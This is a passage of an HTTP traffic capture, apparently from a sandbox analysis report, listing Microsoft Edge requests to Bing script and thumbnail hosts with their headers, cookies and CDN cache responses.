sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:51:03 GMT
etag: 0x8DCDC5CDFF72AD3
content-length: 512
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: V1kiVXzIRqmzPm5TrNimoA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c2d94308-501e-006f-4b98-164244000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=77478
expires: Fri, 18 Oct 2024 18:35:36 GMT
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199058.9ad5501
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/QbhTTihqpIpuQBHI4z0cMxYJtFg.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/QbhTTihqpIpuQBHI4z0cMxYJtFg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:00:56 GMT
etag: 0x8DCDC5E41B5114A
content-length: 259
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: jDpfrkHEWPKiRt+7YgCBFw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ba2b9dd0-e01e-0054-6187-18001a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=284352
expires: Mon, 21 Oct 2024 04:03:30 GMT
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199058.9ad5502
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 584
cache-control: public, max-age=726566
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MEM_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43931
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.360b16ff-5978-40e3-9c67-ff327e5ca418&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.360b16ff-5978-40e3-9c67-ff327e5ca418&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1392
cache-control: public, max-age=574018
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43932
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.5aDiscebQgPfvKR9LaeCGAHaE7&w=80&h=80&c=7&qlt=80&o=6&pid=13.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.5aDiscebQgPfvKR9LaeCGAHaE7&w=80&h=80&c=7&qlt=80&o=6&pid=13.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2535
x-check-cacheable: YES
cache-control: public, max-age=2332545
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43936
GET

https://th.bing.com/th?id=ODLS.20cd948f-abd8-42b2-b05c-d217d2760350&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.20cd948f-abd8-42b2-b05c-d217d2760350&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1369
x-check-cacheable: YES
cache-control: public, max-age=1094644
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b4393b
GET

https://th.bing.com/th?id=OIP.YZQ90vfFDbTT1IsyUXkf7AHaEc&w=80&h=80&c=1&vt=10&bgcl=eb057c&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.YZQ90vfFDbTT1IsyUXkf7AHaEc&w=80&h=80&c=1&vt=10&bgcl=eb057c&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1809
cache-control: public, max-age=2129139
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b4393c
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1668
cache-control: public, max-age=828910
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b4393e
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.iU3Ttm48_MlTX7rtNHBYSgHaFF&w=80&h=80&c=1&vt=10&bgcl=519221&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.iU3Ttm48_MlTX7rtNHBYSgHaFF&w=80&h=80&c=1&vt=10&bgcl=519221&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1379
cache-control: public, max-age=1164749
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b4393d
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.dfe4b4f9-a2b4-4099-9451-edb6379f4d5a&w=32&h=32&o=6&pid=AdsPlus

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.dfe4b4f9-a2b4-4099-9451-edb6379f4d5a&w=32&h=32&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1629
cache-control: public, max-age=1084312
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
